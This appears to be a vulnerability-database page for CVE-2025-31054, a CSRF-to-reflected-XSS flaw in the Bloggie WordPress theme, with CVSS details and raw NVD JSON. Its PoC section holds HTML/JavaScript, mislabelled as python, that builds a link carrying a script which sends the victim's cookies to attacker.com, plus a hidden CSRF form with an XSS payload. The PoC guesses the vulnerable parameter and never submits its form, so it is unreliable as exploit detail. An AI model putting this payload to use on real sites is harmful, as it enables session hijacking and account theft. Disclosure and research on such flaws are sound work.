Security Vulnerability Report
中文
CVE-2025-31054 CVSS 7.1 HIGH

CVE-2025-31054

Published: 2025-12-31 20:15:43
Last Modified: 2026-04-28 19:30:57

Description

Cross-Site Request Forgery (CSRF) vulnerability in Themefy Bloggie allows Reflected XSS.This issue affects Bloggie: from n/a through 2.0.8.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Bloggie < 2.0.9
Bloggie n/a through 2.0.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-31054 PoC: CSRF to Reflected XSS in Bloggie Theme --> <!-- This PoC demonstrates how an attacker can exploit the CSRF vulnerability to inject malicious JavaScript via reflected XSS --> <!DOCTYPE html> <html> <head> <title>CVE-2025-31054 PoC</title> </head> <body> <h2>CVE-2025-31054: CSRF + Reflected XSS in Bloggie Theme</h2> <p>Target: WordPress site with Bloggie theme < 2.0.9</p> <!-- Malicious link that exploits the reflected XSS --> <p>Malicious URL (for social engineering):</p> <code id="maliciousUrl"></code> <script> // Generate malicious URL targeting Bloggie theme const targetBase = 'http://target-wordpress-site.com'; const maliciousScript = '<script>document.location="https://attacker.com/steal?cookie="+document.cookie<\/script>'; // The vulnerable parameter varies - typically in theme options or AJAX handlers const maliciousUrl = targetBase + '/wp-admin/admin-ajax.php?action=bloggie_ajax&param="' + encodeURIComponent(maliciousScript) + '"'; document.getElementById('maliciousUrl').textContent = maliciousUrl; // Auto-submit form for CSRF attack document.write('<form id="csrfForm" action="' + targetBase + '/wp-admin/admin.php" method="POST">'); document.write('<input type="hidden" name="page" value="bloggie-settings">'); document.write('<input type="hidden" name="bloggie_option" value="<script>alert("XSS")<\/script>">'); document.write('</form>'); console.log('CVE-2025-31054 PoC loaded'); console.log('Target:', targetBase); console.log('Vulnerability: CSRF allows forged requests, reflected XSS executes malicious script'); </script> <p><strong>Note:</strong> This PoC is for educational and authorized testing purposes only.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-31054", "sourceIdentifier": "[email protected]", "published": "2025-12-31T20:15:42.500", "lastModified": "2026-04-28T19:30:56.510", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Themefy Bloggie allows Reflected XSS.This issue affects Bloggie: from n/a through 2.0.8."}, {"lang": "es", "value": "Vulnerabilidad de falsificación de petición en sitios cruzados (CSRF) en Themefy Bloggie permite XSS Reflejado. Este problema afecta a Bloggie: desde n/d hasta 2.0.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/theme/bloggie/vulnerability/wordpress-bloggie-2-0-8-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}